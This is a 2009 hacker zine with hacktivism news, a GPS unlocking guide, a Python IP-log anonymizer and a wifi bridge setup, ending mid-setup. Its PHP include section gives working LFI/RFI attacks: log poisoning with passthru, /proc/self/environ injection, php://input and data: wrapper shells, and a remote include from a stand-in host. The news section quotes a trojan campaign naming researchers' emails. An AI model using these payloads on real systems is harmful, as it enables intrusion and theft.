"You want a seriously righteous hack you score one of those Gibsons man. You
know super computers they use to do physics and look for oil and stuff ... Oh
man Wouldn't you just love to get one of those Gibsons, baby!"
?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!
################################################################################
__-----_. .-------------------.
/ \ \ o o o O O O ( HACK THIS ZINE #7 )
/ | | | \___ ._. ( SUMMER 2009 )
| |----------\ | |""""""". ( HACK THE GIBSON )
| |\ bloc up / | | " -___________________-
\___/ \ homie / | | "
\ \_____/ | | "
| | | | |
/ \-_ | | |'
/ \_ "__ _ !_!--v---v--"
/ "| |>) |""""""""|
| _| | ._--""|| |.- -. .- .-. -.-. .... .. ... --
_\_____________|_|_____||________|_
secret openssh 0day release issue - proof of concept code below - no seriously!!
################################################################################
Hack This Zine #7 : Hack The Gibson
Summer 2009 : staff@hackbloc.org
table of (dis)contents:
->Meta
1 Letters
2 News in the Briefs
-->Tech
3 Hacking Your GPS
4 Alternative PHP Include Attacks
5 Hiding from the man: Apache Obfuscation
6 Sucking Signal
7 Hardware Hacking
-->Philotics
8 Tech vs Industry
9 Copwatch 2.0
-->EOF
################################################################################
but first a message from our blackhat overlords, cause if you didn't dig it
then then you better dig it now:
"Full-disclosure is the disclosure of exploits publicly - anywhere. The
security industry uses full-disclosure to profit and develop scare-tactics
to convince people into buying their firewalls, anti-virus software, and
auditing services.
...
It is our goal that, through mayhem and the destruction of all
exploitive and detrimental communities, companies, and individuals,
full-disclosure will be abandoned and the security industry will be
forced to reform.
...
This isn't like before. This time everyone and everything is getting owned.
Signed: The Anti-sec Movement" - the latest revival of pr0j3kt m4yh3m and el8,
h0no, dikline, zfo, etc.
################################################################################
# 1. LETTERS #
################################################################################
From: Rhonda
site was down earlier eh...nice to see you back up.
http://securityforthemasses.blogspot.com/2009/03/hackbloc-down.html
Regards
Yea, apparently we had some issues with our server this month, 2 tips for using
the rm command. Don't use it with the * operator, and don't use it while tired,
or drunk.
From: Wan_Hacker
I have problem on my computer. when I put my pen drive password box pop out. how
to settle this prob
Try entering a password? Alternatively, you could format the drive. Or see above
for a tutorial on the rm -rf command.
From: Salchoman hey, i'm from Colombia and i'd love to help you translating,
mail me if i can help u :]
From: salcho Hey, it would be great to help you translating htz to spanish!
would it be of any help?
Hey HackBloc! I'll start translating it right over, I'll start with number 6. Is
that all right?
Thats great! And you don't (nor does anyone else) need to ask our
permission to translate. :) We would love any translations that anyone can do!
All translations are welcomed and very helpful for non english speakers. Please
if you can translate any and all issues (especially the most recent ones). We
will appreciate it very much, we will try to send you some free issues and give
you credit in the zine! Plus if you can translate issues, we will send you
future issues before we publish them, so that you can translate those if you
like! If you make translations please send them to the hack this zine mailing
list or to staff@hackbloc.org
From: Wine Skeem <wannest@boiiom.com>
This iss your penis: 8--o
This iss your penis on drugs: 8=====O
Any quuestions? Wine Skeem,
First of all: Sick ascii art! Second of all: Sorry, those of us with penises
have straight edge penises and we would appreciate it if you and your friends
would stop peddling your dope on our bandwidth. Third of all: we would
appreciate it if all future email regarding penises would be encrypted you can
find out public key at http://hackbloc.org/etc/hbStaffPubkey.txt
Subject: Can She Have Multiplle Orgasms?
From: Glimp Cypher <saurischian@lan-ev.org>
Do you want to be seen as a capptain of the bedroom? Do you want your woman to
be RAVING to her friends about the great sex she has while all of them get
normal boring sex? Well if you do, then you deffinitely need to ...
Glimp Cypher,
We don't want to be captain of the bedroom, maybe more something like
"Caaaaaaptain Caveman!" What's all this sex stuff, we don't have sex, we work
on our sick monitor tans. PS, please don't tell me you took any of that shit
that Wine skeem was pushing. Your penis is going to turn into some ascii art
matching the regular expression /8=+0/
################################################################################
# 2. NEWS IN THE BRIEFS! #
################################################################################
US Federal Prisons start rolling out TRULINCS email system
------------------------------------------------------------
Select federal prisons have been trying out heavily restrictive computer systems
allowing prisoners to correspond via email. The system charges by the minute,
strips all html/attachments. The BOP expects the system to be available in all
federal prisons by June 2011.
The BOP website provides some information about TRULINCS. Not surprisingly, they
confirm all communications are monitored, which is possibly the whole purpose of
the program (physical mail is difficult and inefficient to monitor and store
into searchable databases).
Inmates must initiate communication and get approval of both the receiver and
prison staff (similar to visitor lists). Emails originate from <register
number>@inmatemessage.com.
http://www.bop.gov/inmate_programs/trulincs_faq.jsp
p2pnet Wins Free Speech Supreme Court Case in Canada
----------------------------------------------------
In 2006 and 2007, former Green Party organizer and Vancouver businessmen Wayne
Crookes has filed lawsuits against several websites including Google and
Wikimedia alleging that they had 'published' defamatory content. Also charged
was p2pnet who had been accused of simply linking to several defamatory
websites.
In a October 27, 2008 decision, Judge Stephen Kelleher threw out the case,
stating "Although a hyperlink provides immediate access to material published on
another website, this does not amount to republication of the content on the
originating site. This is especially so as a reader may or may not follow the
hyperlinks provided."
http://www.p2pnet.net/story/17398
http://torrentfreak.com/p2pnet-wins-landmark-hyperlink-case-081029/
Facebook terms and services agreement
-------------------------------------
Facebook's Terms of Use "grants Facebook an irrevocable, perpetual,
non-exclusive, transferable, fully paid, worldwide license (with the right to
sublicense) to (a) use, copy, publish, stream, store, retain, publicly perform
or display, transmit, scan, reformat, modify, edit, frame, translate, excerpt,
adapt, create derivative works and distribute" etc etc.
For a brief period of time, Facebook changed it's TOS to allow them to use all
your information after you remove your sign up information; they were forced to
revert to the old TOS because of a public backlash. Of course, you cannot trust
any information you put online, especially to a major corporation such as
Facebook.
People who are concerned about privacy and security should consider using
Riseup's Crabgrass social networking system at http://we.riseup.net
Cuba Claims US Gov Backdoors in Windows, Develops Custom Linux Variant
-----------------------------------------------------------------------------
The majority of computer systems in Cuba are running Windows; the government
hopes to change this by developing and releasing their own customized version of
Linux called 'Nova' (which appears to be a customized version of Gentoo).
Amongst it's reasons for transitioning to Linux they claim that US Government
agencies may have access to backdoors built into Microsoft code and that it is
difficult to obtain legal Windows copies because of the US Trade embargo.
"I would like to think that in five years our country will have more than 50
percent migrated," dean of the School of Free Software Hector Rodriguez stated.
http://techdirt.com/articles/20090212/1347183753.shtml
Labor Report: "Dehumanization of Young Workers Producing our Computer Keyboards"
-------------------------------------------------------------------------------
An undercover investigation has revealed atrocious working conditions in the
Meitai factory in southern China, which mass produces keyboards for american
corporations such as IBM, Microsoft, Dell, HP, and Lenovo. The report is very
comprehensive and includes pictures from within the facility. Here is an
excerpt:
* The workers are paid 1/50th of a cent for each operation.
* The assembly line never stops, and workers needing to use the bathroom must
learn to hold it until there is a break.
* All overtime is mandatory, with 12-hour shifts seven days a week and an
average of two days off a month. A worker daring to take a Sunday off—which is
supposedly their weekly holiday—will be docked 2 % days' wages. Including
unpaid overtime, workers are at the factory up to 87 hours a week. On average,
they are at the factory 81 hours a week, while toiling 74 hours, including 34
hours of overtime, which exceeds China's legal limit by 318 percent!
* The workers are paid a base wage of 64 cents an hour, which does not even come
close to meeting subsistence level needs. After deductions for primitive room
and board, the workers' take-home wage drops to just 41 cents an hour. A worker
toiling 75 hours a week will earn a take-home wage of $57.19, or 76 cents an
hour including overtime and bonuses. The workers are routinely cheated of 14 to
19 percent of the wages legally due them.
* Ten to twelve workers share each crowded dorm room, sleeping on narrow metal
bunk beds that line the walls. They drape old sheets over their cubicle
openings for privacy. In the winter, workers have to walk down several flights
of stairs to fetch hot water in a small plastic bucket, which they carry back to
their rooms to take a sponge bath. In the summer, dorm temperatures reach into
the high 90s.
* Workers are locked in the factory compound four days a week and are prohibited
from even taking a walk.
* To symbolize their "improving lives" the workers are served a special treat on
Fridays—a small chicken leg and foot. For breakfast, they are given watery rice
gruel. The workers say the food has a bad taste and is "hard to swallow."
* Illegally, workers are not inscribed in the mandatory work injury and health
insurance and Social Security maternity leave program. In the Molding
department, due to the excessive heat, the workers suffer skin rashes on their
faces and arms.
* One worker summed up the general feeling in the factory: "I feel like I am
serving a prison sentence."
Read the Full Report: http://www.nlcnet.org/article.php?id=613
http://www.nlcnet.org/admin/media/images/China/2009%20meitai%20factory/images/
workers%20inserting%20keys.jpg
[caption: chinese sweatshop producing keyboards for american corporations]
http://www.nlcnet.org/admin/media/images/China/2009%20meitai%20factory/images/
lunch%20line%20from%20back.jpg
[picture: workers in uniform line up for watery rice gruel breakfast]
Corporate Contact Information:
Lenovo / U.S. Office
1009 Think Place / Morrisville, North Carolina 27560 / Phone: 866-968-4465
President and CEO: Mr. William J. Amelio Director of the Board: Yang Yuanqing
Hewlett-Packard Company
3000 Hanover Street / Palo Alto, CA 94304-1112 / 650-857-1501 / Fax 650-857-5518
International Business Machines Corp.
1 New Orchard Road / Armonk, NY 10504-1722 / 914-499-1900 / Fax: 914-765-7382
E-mail: sam at us.ibm.com (CEO Samuel Palmisano's e-mail address)
Dell Inc.
One Dell Way / Round Rock, TX 78682 / Phone: 512-728-4100 / Fax: 512-238-2773
Microsoft Corporation
One Microsoft Way / Redmund, WA 98052-6399 / 425-882-8080 / Fax: 425-936-7329
Recent Hacktivist Actions:
--------------------------
Hackers Against Oppression launch electronic civil disobedience actions in
solidarity with Greece Riots
--------------------------------------------------------------------------------
While the streets of Greece went up in flames in protest of the police murder of
anarchist youth Alexandros Grigoropoulos, a group of hackers calling themselves
Hackers Against Oppression have organized an electronic civil disobedience
action releasing sit-in scripts attacking Greek government websites. Here is an
excerpt from their communique:
"Hackers Against Oppression have called for Electronic Civil Disobedience in
Solidarity with Greek Anarchists on Wednesday Dec 31, the final day of
December. December is the month in which Alexandros Grigoropoulos, a
15-year-old Anarchist, was murdered in cold blood by Greek Police. It is also
the month that will forever be remembered by all those who struggle. Minutes
after his murder, thousands of Greek residents took to the streets as did
thousands around the world. Even liberal groups have called for the
resignation of the Greek government. The streets were taken back for the
people, police buildings were firebombed, and banks were turned into empty
charred-out boxes. This entire time, the Greek government has been fighting
and oppressing people with guns, tear gas, and the media. It's time that we
take them down."
"We will be attacking the websites of the Greek Police and the Prime Minister.
They are directly responsible and we will directly respond. They will no
longer be able to spread their lies to the media about what is going on in the
streets. You can either load the file on the day of the action or download it
ahead of time. We suggest downloading it ahead of time in the event that our
site get shut down."
Hackers for Total Liberation launches campaign against Huntington Life Science
--------------------------------------------------------------------------------
A group calling itself Hackers for Total Liberation has started several actions
against the notorious Huntington Life Science corporation which is guilty of
torturing and abusing animals. Amongst their actions they have attempted to
infect research computer systems within Berkeley with a destructive virus as
well as launch an electronic sit-in against HLS websites. Here are some excerpts
from the communiques they have released:
"Monday, January 26, you are invited to join us on an Electronic Sit In
against HLS collaborators. We will be targeting the website of HLS's
auditors RMSBG and since on the 26th it is the day of action against HLS
customer, Bayer, we are targeting the website of one of their biggest
products, aspirin.com."
"UC Berkeley vivisector Ralph Freeman and all of the current lab members
in Freeman's Visual Neuroscience Lab (http://neurovision.berkeley.edu)
were sent a trojan horse virus embedded into email. This virus is
designed to completely wreck their computers while leeching all vital
personal information they've ever entered into their systems."
"In addition to Freeman (freeman@neurovision.berkeley.edu), we sent the
virus to Brian Pasley (bpasley@socrates.berkeley.edu), Thang Duong
(thangd@uclink.berkeley.edu), Elena Allen (eadelle@uclink.berkeley.edu),
Nina Yang (ninay@neurovision.berkeley.edu), Lars Eric Holm
(larseric@neurovision.berkeley.edu), BaoWang Li
(libaowang@neurovision.berkeley.edu), and Ahalya Viswanathan
(ahalya_v@uclink.berkeley.edu)"
"It is time to buy new computers, and after that, save yourself the hassle
that will follow and get the fuck out of this cat killing lab. The lab where
kittens as young as six weeks live in daily fear and trauma from the violence
that you are responsible for. The cats in stereotaxic devices with holes
drilled into their skulls are what drives us and we will do anything to end
your torture."
"This action is dedicated to all those fighting for primate freedom at UCLA
and all those who have taken action as of late against the animal murder
industries in Central and South America. It is for the billions of animals
currently enslaved."
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
we're not bitter ... and neither is our coffee! RNC 8 special blend
All proceeds go to the RNC 8. 1/2 lb bags of fair trade, medium roast, whole
bean coffee available for $10 USD (shipping included). Place your order now by
contacting ----- darkhartroastery@gmail.com -----
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
################################################################################
# 3. Hacking your GPS Personal Navigation Assistant by KuroiShi #
################################################################################
DISCLAIMER: You can permanently break your GPS by doing this. I haven't yet,
but I'm sure it's possible. I've heard of people bricking their GPS unit just
by running 3rd party WinCE software on it. Don't say you were not warned.
I recently got a PNA unit for my Chicago alley mapping project and learned some
useful things about inexpensive touch screen devices on the market today.
First off, most devices sold today are just locked down WinCE devices with low
memory, no keyboard, GPS chipset and touchscreen. Many include SD cards and
USB interfaces and are easy to hack and install third party software on. GPS
hardware is cheap, and when you buy an expensive unit, your paying for the fancy
navigation software and map updates it comes with. Many of the expensive units
run on the same hardware as ones you can pick up for $60-$80 bucks on sale.
I did all my work on the Holux GPSMile 52+, running WinCE 5.0. From what I've
gathered, it seems most PNA's these days run on the same or similar hardware.
Mine uses a Samsung S3C2440A 400mhz ARM processor, with the SirfStar III GPS
chipset, 32Mb NAND flash + 64Mb SDRAM internally, plus an SD slot for mapping
software. It has a 3.5" (320x240 resolution) screen, which is important,
because some of the software I run is made for 480x272, and you need to modify
it so it fits on your screen. GPS units similar to mine that might find this
guide useful are:
Mio c310x, c320, c520, c710, c220, c620 and c720.
Magellan devices
Navigon devices
Pretty much anything with SirfStarIII, an ARM processor and Windows CE 4. or 5.0
As always, your mileage may vary.
Devices that WON'T unlock this way are:
TomTom devices
Garmin devices
(Both of these devices run a version of linux, and while i'd love to hack around
with one of them, I don't have one!)
My GPS comes with a shitty little shell that launches on boot from the internal
flash memory, it's called setup.exe, and I don't fuck with it because I think it
launches some critical functions on boot. If the SD card is inserted in the
slot, it autoruns the GPS navigation software, called "Holuxnavi.exe", and if no
SD card is present you just sit in the shell where you can select GPS, Pictures,
Music, or change some rudimentary options. It's easy enough to break out of
this by naming whatever you want to run on boot to Holuxnavi.exe (or your
respective auto-launching exe, for your device) This brings us to;
Breaking out of your shell and into WindowsCE.
Now, I'm not sure why you'd want to use Windows CE over a functional and much
prettier shell, but it does let you run software other than what your unit came
with so lets get to it. You'll probably first want to replace your Holuxnavi.exe
(or C310Auto.exe or whatever your GPS device starts at boot time, shouldn't be
too difficult to find) with a basic winCE shell called "ceDesktop.exe" this
will let you explore the files on your device and get a feel for things. You
can get ceDesktop and many other useful tools for this tutorial on
gpspassion.com, gpsunderground.com and ppcwarez.org. (these are forums, most
of the software is hosted on rapidshare.com and similar sites.) Now once you
rename ceDesktop to replace your navigation software we can explore around a
bit, see what minimal DLLs are required to run your device unmodded, etc. Now
would probably be a good time to backup your unit using Microsoft ActiveSync.
I also recommend putting the SD card that comes with the unit in a safe place,
and making a new one from the CD or SD card that came with your unit. Now we
should have access to the CE filesystem and a few basic things (like Control
Panel) Now we get to add some fun software.
Making your PNA environment more useful.
Now you have ceDesktop.exe running on boot, but theres still nothing but control
panel and some shitty navigation software with maps from 2001. I used some of
the tools provided with the C310Auto.zip Mio C310 unlock package on
GPSPassion.com to add some basic tools and get a regular desktop. If you use
this script you'll probably want to change the C310Auto.c31 script around, it
makes some minor registry edits and copies some software to your internal
memory. Also, you need to change the .c31 file to reflect the name of your
executable, (I.E. I rename my C310Auto.exe and .c31 to Holuxnavi.exe and
Holuxnavi.c31 respectively, then I add a line in the .c31 script file to run
ceDesktop after it does it's thing.)
C310Auto comes with some other stuff too, in the \SDMMC\Programs\Utils directory
you'll find some useful tools for adding more software to your PNA. It has a
taskmanager (which I use to kill start.exe to drop to the CE desktop) a
Registry editor, On screen keyboard, a more fully featured filemanager than
ceDesktop, and some status monitoring tools. Surf around and find some more
useful PocketPC apps to run and set up your environment any way you please.
One thing you might want to do is make sure you do everything on the SD card and
leave the internal memory on your unit alone as much as possible. Another
useful hint is to use Dependency Walker on a windows machine to open up your CE
executables and check for DLL dependencies. It's a pain in the ass in this
minimal environment to get software running.
Installing 3rd party navigation software.
My unit came with Smart2Go which is some REALLY REALLY basic (read shitty)
navigation software. I never really tried using it for navigation, I've read
about it telling people to take random turns off the street into buildings,
random dangerous U-turns and just generally bad navigation and getting you lost.
Plus the maps were so out of date that roads have been moved since it came out.
I downloaded iGo 2008 off of Pirate Bay and used that to replace my navigation
software. Once again I had headaches finding all the DLLs I needed to make the
installer run. Dependency Walker was again, a life saver. Some other popular
software people run for navigation is MioMap, Finean, Destinator, PolNav,
Route66, TomTom (Older versions, pre linux), Garmin (Same as TomTom, need to run
older version) I suggest you just try them out. A good place to find this
stuff is ppcwarez.org, gpsunderground.com, and thepiratebay.org.
GPSPassion.com is an excellent resource for figuring out how to configure your
unit, but they have taken a decidedly negative stance towards running pirated
software on your GPS unit. Also, if you find your unit crashing a lot during
large file transfers and software installs, try turning up your virtual memory
settings in the control panel.
Installing PDA software on your PNA.
Now hopefully everything has gone well and you have unlocked your WinCE, and
installed some useful navigation software and some system tools. Now what
about playing DOOM and having contacts stored and a tip calculator and all that
fun stuff? I can't really recommend this software without saying first that
I've read on forums of people using applications like this and it throwing off
the touchscreen calibration to the point where the device is useless. Again
I'll repeat "THIS CAN BRICK YOUR GPS DEVICE AND MAKE IT USELESS!" The problems
I have heard were with the GAPI graphics library crashing and then the
touchscreen never works again. I haven't had any problems, but you can't say I
didn't warn you. MioPocket is a suite of free software distributed online
that turns your PNA into a PDA. It was written for the Mio PNA's, but it runs
fine on my Holux unit. It has some useful shareware navigation software such
as BeeLineGPS that I like for geocaching and for mapping my tracks in google
maps. (For my aforementioned Chicago Alley Mapping Project) MioPocket also has
a bunch of shareware/freeware PDA software such as Microsoft Office document
viewers, calculators, games, etc. etc. It has a few skins, all pretty, if you
think Vista is pretty. MioPocket runs at 480x272 by default, so if you have a
smaller unit like mine, you'll need to choose one of the 320x240 skins. While
it's pretty and fun to fuck around with, I don't trust MioPocket one bit, and
only run it occasionally. I built my own interface using some of the tools
from the C310Auto package, some of the tools from MioPocket, and running a copy
of iGo 8, It seems to run way more stable than MioPocket, and I don't have to
worry about accidentally bricking my GPS with a crash. MioPocket is hosted on
Rapidshare, you can get a link to the latest version on the GPSPassion.com
forums.
Useful resources.
I thought I'd just give you a run down of the resources I found most useful in
hacking my GPS device.
GPSPassion.com - The most useful resource, GPS Enthusiasts from all over the
world post useful information here. They don't like discussion about running
illegal software on your PNA.
gpsunderground.com - This site mostly just references to GPSPassion, but theres
still some good info here, plus they aren't strict about talking about running
pirated software.
ppcwarez.org - Links to pirated PocketPC software. They have a whole GPS
section with maps and nav software.
thepiratebay.org - Lots more current maps and nav software. ppcwarez is
missing a lot of US maps and such, plus rapidshare is a bitch.
dependencywalker.com - Find out what DLLs your CE software depends on. (Sorry,
windows only.)
microsoft.com - ActiveSync for syncing files with your PNA. Linux users can
just use an SD card or theres several linux alternatives to ActiveSync.
################################################################################
# 4. Alternative PHP Include Vulnerability Techniques by Anonymous #
################################################################################
One of the fundamental mistakes made by PHP developers is to improperly sanitize
variables before being passed to system functions - particularly include() and
require(). This common mistake leads to what is known as Remote File Include and
Local File Include type vulnerabilities. In the past few years PHP itself has
started to ship with default configuration settings to try to neutralize or
limit the effects of such vulnerabilities. But even with simple local file
includes, there are newer techniques to exploit these vulnerabilities that lead
to remote command execution.
Introduction to PHP include vulnerabilities
--------
The point of file include type vulnerabilities is to figure out a way to include
a file with your malicious PHP code in it.
<?php include($_GET['content']); ?>
http://asdf/index.php?content=/etc/passwd
http://asdf/index.php?content=http://malicious.com/exec.php
The first example will include the local file /etc/passwd. The second example
will attempt to retrieve exec.php from malicious.com. This remote include is
turned off by the default allow_url_fopen PHP setting in most situations.
The vulnerable PHP code might be a little more restrictive than the above
example. By prepending the include with a directory they prevent remote file
includes(http://) and by appending a file extension they can attempt to restrict
which types of files can be included.
<?php include("pages/" . $_GET['content'] . ".php"); ?>
http://asdf/index.php?content=../../../etc/passwd%00
The use of ../ allow directory transversal style manipulations and lets you
navigate outside of the prepended directory in the code. If the PHP setting
open_basedir is on, it will prevent you from navigating around too much. The web
developer might also use some sort of sanitation function to strip malicious
characters out of user input, but this is not always the case.
The null byte character (%00 \0) terminates the string and cuts off whatever
comes after it, but this is also escaped when magic_quotes_gpc is turned
on(default). There are techniques published in the paper "PHP filesystem attack
vectors" at http://ush.it that provide possible ways to get around sanitation of
null byte characters.
The PHP script may also depend on such variables as $_GLOBAL[] or $_SERVER[]
such as the recently discovered phplist vulnerability (patched in 2.10.9):
http://asdf/phplist/admin/?_SERVER[ConfigFile]=/etc/passwd
Local File Include to Remote Code Execution
----
Once you find a local file include vulnerability, you need to find a way to
insert your malicious PHP code into a file on the server. A number of techniques
have appeared over the past few years:
One technique is to inject PHP code in server logs to be later included via the
above include vulnerabilities. It is possible to make a HTTP request inserting
our code into the headers and then including apache's access_log (It may take
some experimentation to find the correct directory for access_log). Consider the
following example which works on a Mac OS X default apache/php configuration
(writing scripts to send requests may be necessary because the browser will
escape certain characters) :
<?php
$a = fsockopen("localhost", 80);
fwrite($a,
"GET /<?php passthru(\$_GET['cmd']); ?> HTTP/1.1\r\n" .
"Host: localhost\r\n" .
"Connection: Close\r\n\r\n" );
fclose($a);
?>
http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id
Another method is including /proc/self/environ which contains the environment
variables for the apache/php process. If we were to insert malicious code into
the User-Agent header, this code appears in that file, and so remote command
execution is possible (provided /proc/self/environ is readable by the web
server).
<?php
$a = fsockopen("localhost", 80);
fwrite($a,
"GET /../../../../proc/self/environ HTTP/1.1\r\n" .
"User-Agent: <?php passthru(\$_GET['cmd']); ?> \r\n" .
"Host: localhost\r\n" .
"Connection: Close\r\n\r\n" );
fclose($a);
?>
PHP wrapper include vulnerabilities
--------
Another way of exploiting PHP include functions are utilizing php:// wrappers
(http://www.php.net/wrappers.php). This example will utilize php://input which
takes raw data from an HTTP POST request and executes it:
Vulnerable code:
<?php include($_GET['content']); ?>
Our request:
<?php
$request = "<?php passthru('id;');?> ";
$req = "POST /index.php?content=php://input HTTP/1.1\r\n" .
"Host: localhost\r\n" .
"Content-type: text/html\r\n" .
"Content-length: " . strlen($request) . "\r\n" .
"Connection: Close\r\n\r\n" .
"$request \r\n\r\n";
$a = fsockopen("10.0.2.2", 80);
fwrite($a, $req);
echo $req;
while (!feof($a)) { echo fgets($a, 128); }
fclose($a); ?>
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
This sample requires both allow_url_include and allow_fopen_include to be on, in
which case the standard remote file inclusion (http://malicious/exec.txt) is
possible. The advantage of this method is that it does not depend on storing
files on external servers. cr0w-at.blogspot.com mentions another technique using
the "data:" wrapper:
index.php?content=data:,<?php system($_GET[c]); ?>?&c=dir
Or with base64 encryption (possibly bypassing validation/sketchy logs):
index.php?content=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
Conclusion
----
Most of these methods are nothing new and do not demonstrate flaws or
limitations in the PHP language itself. These problems can typically be
prevented by strong input validation, common sense coding, and some tighter
server configurations. However it does not seem likely that many of these types
of problems(among others, such as SQL injection) will be going away anytime
soon. So Happy Hacking!
################################################################################
# 5. Hiding from the man: Apache IP Obfuscation by Flatline #
################################################################################
Recently I was considering the problem of keeping logs, obviously there are many
reasons to keep apache logs on your server such as keeping stats, seeing who has
been attack your website, and so on. The problem with logs is that they can be
a privacy hazard for your users if your server were to be seized, the police
would be able to figure out who had been visiting your site. I decided to come
up with a solution to alleviate some of the privacy concerns, while still
retaining the uniqueness of an ip address through a session so that useful
webstats could still be gained. What I came up with was the following script.
This script takes an ip adress and turns it into another ip address using a
simple algorithm and the md5 hash. This makes it so the ip addresses in your
logs are not the users real ip addresses yet you will still be able to track the
path a user takes through your site, since ip addresses will
remain the same.
This script is not perfect of course, the main problem being that it is
extremely vulnerable to a rainbow tables style attack. The possible keyspace
for IP's is only 255^4 leaving about 4 228 250 625 possibilities for ip's. An
attacker with enough time on their hands could quickly create a rainbow table
for this script. The problem would of course be alleviated by using ipv6 which
has a keyspace of 3.4 * 10^38 ip addresses, making it nearly impossible for a
rainbow tables style attack to work. (Though by the time anyone adopts ipv6
computing power will probably have significantly increased.)
Right now this script is only in a proof of concept stage, it lacks many
fundamental features like error checking and the ability to parse log files, but
if it works out I plan to make a full apache module for it.
#!/usr/bin/python
"""
anonIP - Anonymize ip addresses in your logs while still mantaining ip address
integrity
Author - flatline <flatline@hackbloc.org>
Copyright - GPLv3
Version = 0.1 (2009-03-14)
"""
# This code was found on http://code.activestate.com/recipes/66517/
# The author is Alex Martelli
import socket, struct, sys, md5
def dottedQuadToNum(ip):
#turns an Ip address into a number, duh!
"convert decimal dotted quad string to long integer"
return struct.unpack('!L',socket.inet_aton(ip))[0]
def numToDottedQuad(n):
"convert long int to dotted quad string"
return socket.inet_ntoa(struct.pack('!L',n))
# Now starts my code
def ip2anonymous(ip):
long = dottedQuadToNum(ip)
m = md5.new(str(long)).hexdigest()
newLong = int(m,16) % 4294967295 #This modulo is because socket.inet_aton
chokes on an int > 4294967295
newip = numToDottedQuad(newLong)
return newip
print ip2anonymous(sys.argv[1])
################################################################################
# 6. Sucking Signal by Sally #
################################################################################
Recently I had to set up a wifi network that is open to guest and volun¬teers at
where I work and live. However, it needed to be set up outside the range that
the omni antenna was already broadcasting. So what I did was purchase a
directional antenna to "suck" the signal from the omni antenna and bring it
through a bridged router and out through a regular router to the guest and
volunteers further up the property. With the help of a couple of IT consultants
and a Linksys router with DD-WRT firmware, this was made possible and I'll tell
you how.
EQUIPMENT
•2.4 GHz 24 dBi High Performance Die Cast Reflector Grid Wireless LAN Antenna
(Directional Antenna)
•HyperAmp® AP 1 Watt 2.4 GHz 802.11g (b/g) Compatible Outdoor Bi- Directional
WiFi Amplifier with Active Power Control
•N-Male to N-Male: 400-Series Cable 30 feet
•N-Female to N-Female Bulkhead 0-6 GHz Lightning Surge Protector
•N-Male to N-Male: 400-Series Cable 25 feet
•N-Male to Reverse Polarity TNC Plug: 400-Series Cable 2 feet
•2 Linksys WRT54GL v 1.1 routers – one acting as a bridge and the other acting
as an AP.
Note: You don't have to use the equipment I used. There's cheaper stuff out
there.
SET UP
So, with the help of a co-worker and friend, we got the directional antenna on
the roof mounted next to a fan, but far enough so the fan did not mess with
reception. We then connected the amp to the antenna just a foot under the
antenna on the same pole. Then we took the 30 foot n-male to n-male 400 series
cable and connected it to the lightning protector. We put the lightning
protector in a weather proof box and attached it to the roof. A 20 foot cooper
wire was connected to the top of the lightning protector and then run down to
the ground where it was attached to a ground stake and pounded into the ground
(we have a lot of rain and thunder here, so that was needed). The 25 foot n-male
to n-male cable was connected to other end of the lightning protector and run to
the power injector (which comes with the amp) and is located indoors next to the
routers. The n-male to tnc 2 foot cable was run from the power injector to the
Linksys router that we used as a bridge. It went where one of the short rubber
duck antennas was located. The other Linksys WRT54G router became an Access
Point (AP) and was connected to the bridge via a cat 5e cable. One end of a cat
5e cable was connected to the internet (WAN) port of the AP and the other end
was connected to port 1 of the bridge.
FLASH FIRMWARE
The following explains how to wipe the Linksys firmware on a router and replace
it with DD-WRT. For this article, you only have to flash the firmware for the
router that will be the bridge because the Linksys firmware does not have bridge
capabilities.
Note 1: If not followed properly, your router can be bricked. Linksys won't
provide support when you install 3rd party firmware. We are not responsible for
a bricked router. Do this at your own risk.
Note 2: Do this over a wired connection.
Note 3: Backup the router's CFE before flashing the firmware
(http://www.dd-wrt.com/wiki/index.php/CFE_backup). That way you can replace
your CFE should a brick occur.
1. Hard Reset: 30-30-30
a. Plug in the router.
b. Push in the reset button with a pen.
c. Hold it for 30 seconds.
d. Don't let go and pull the power cord out for 30 seconds.
e. Put the power cord back in for 30 seconds.
2. Wait.
3. Flash firmware.
a. Open a browser and go to 192.168.1.1.
b. User=Admin and Password=Admin.
c. Go to the Administration tab.
d. Then go to Firmware Upgrade subtab.
e. Go here to find the proper firmware for the router you are using.
http://www.dd-wrt.com/wiki/index.php/Supported_Devices#Linksys_.
28all_the_rest_that_is_not_re-engineered_til_today.29
1. The last column tells you what to use.
f. Use the latest build. ftp://dd-wrt.com/others/eko/V24_TNG/svn11296/
i. Version 24 service pack 2 svn11296 seems the most stable.
ii. For this article we downloaded dd-wrt.v24-11296_NEWD_mini.bin
g. Browse to the location you downloaded the firmware.
i. Click upgrade.
4. Wait.5 minutes.
a. Lights should return to normal.
b. Failing to wait is how most people brick their routers.
5. Do a power cycle of the router.
a. Unplug the power cord, count to 30 and plug it back in.
6. Wait for the lights to return to normal, usually about 2 minutes.
7. HARD reset again (see #1 above).
a. Wait.
b. Check for the password page and re-login to change the password.
c. Then you can reconfigure your settings manually.
Things not to do!
1. Don't install old config files on newer firmware upgrades.
2. Don't unplug or reset while firmware is upgrading.
3. Don't use v24 sp1.
Which version of firmware to use:
The final version of 24 (currently SP2): SVN11296 seems very stable.
1. WRT54G v2 vintage (vint) firmware.
2. WRT54G v5 newd micro.
3. WRT54G v8 v24 micro
4. WRT54GL newd mini when first flashing, then newd std.
Troubleshooting
• On a WinXP OS use IE explorer instead of Firefox or clear the cache on
Firefox if it seems that changes aren't saving.
• Use http not https when browsing to the IP addresses.
CREATE BRIDGE
I went to DD-WRT wiki and found out how to create a bridge using the DD-WRT
firmware on the Linksys router
(http://www.dd-wrt.com/wiki/index.php/Wireless_Bridge). This is how it worked
for me:
1. Currently, your router should be IP is 192.168.1.1 from reseting it.
2. Log into the DD-WRT router.
a. User: root and pass: admin.
b. Otherwise, you might be asked to set the username and password.
4. Go to the Setup Tab > Basic Setup
a. Connection Type: Disable
b. STP: Disable
c. Set Local IP: 192.168.2.2.
i) This IP address is for the bridge.
ii) You can make it whatever IP address you want, but it must be in the
subnet of the gateway IP address.
